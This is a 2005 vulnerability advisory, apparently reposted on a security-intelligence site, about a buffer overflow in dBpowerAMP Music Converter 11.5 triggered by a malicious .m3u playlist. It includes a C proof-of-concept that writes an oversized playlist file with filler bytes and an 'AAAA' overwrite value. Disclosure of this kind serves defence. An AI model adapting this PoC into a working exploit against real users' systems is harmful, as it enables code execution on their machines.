dBpowerAMP Music Converter v11.5 Local Buffer Overflow Issue due to malicious playlist fil
`dBpowerAMP Music Converter v11.5 and priors Local Buffer Overflow Issue
Original: http://secubox.shadock.net/dBpowerAMP_Music_Converter_v11.5_Local_Buffer_Overflow_Issue.html
VULNERABLE PRODUCT
-----------------------------------
Software: dBpowerAMP Music Converter
Corporation: Illustrate
Release: 11.5 and priors.
------------------------------------
BACKGROUND
--------------------
Often called the Swiss army knife of audio, dMC can digitally rip sound from audio CDs to a multitude of formats. Convert from one format to another while preserving ID tags. Nearly every audio type is supported, including MP3, MP4, Windows Media Audio, OGG Vorbis, AAC, Monkey's Audio, FLAC, ...
It works from the Windows Explorer right click menu, where it provides quick access to one-click conversion
as well as a new pop-up info box that displays detailed file information for supported formats.
In addition, you can use dBpowerAMP to extract (rip) files from a CD, featuring automatic CDDB support.
CD Ripping is very fast and according to the developer s tests it claims to be the fastes around.
DESCRIPTION
--------------------
A malicious playlist file format ".m3u" file can generate a local exploitation of a buffer overflow
and allows attackers to execute arbitrary code under the context of the user who started the process.
PROOF OF CONCEPT
--------------------------------
Build & mouse over the file or open it ... as you want.
/*
Illustrate dBpowerAMP dMCShell Module Buffer Overflow
Date: 23 December, 2005
Credits: SecuBox Labs
Discovered by: fRoGGz
*/
#include <stdio.h>
char SecuBox[]=
"\x3A\x20\x53\x65\x63\x75\x42\x6F\x78\x20\x4C\x61\x62\x73\x20\x3A"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\x2D\x2D\x5B\x20\x32\x36\x30\x20\x20\x42\x6F\x46\x20\x5D\x2D\x2D"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x90\x90\x90\x90"
"\x41\x41\x41\x41"; // AAAA ...
int main(int argc, char* argv[]) {
FILE *fp;
printf ("SecuBox Labs - Proof Of Concept\n");
printf ("Illustrate dBpowerAMP dMCShell Module Buffer Overflow\n\n");
fp = fopen ("SecuBox.Labs.m3u","w+");
if (!fp) {
printf (" fopen error.\n");
return -1;
}
fwrite (SecuBox, 1, strlen(SecuBox) , fp);
fclose (fp);
printf ("SecuBox.Labs.m3u created.\n");
return 0;
}
CREDiTS
----------------------
SecuBox Labs - fRoGGz
Visit: http://secubox.shadock.net
--------------------------------------------------
--
___________________________________________________
Play 100s of games for FREE! http://games.mail.com/
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo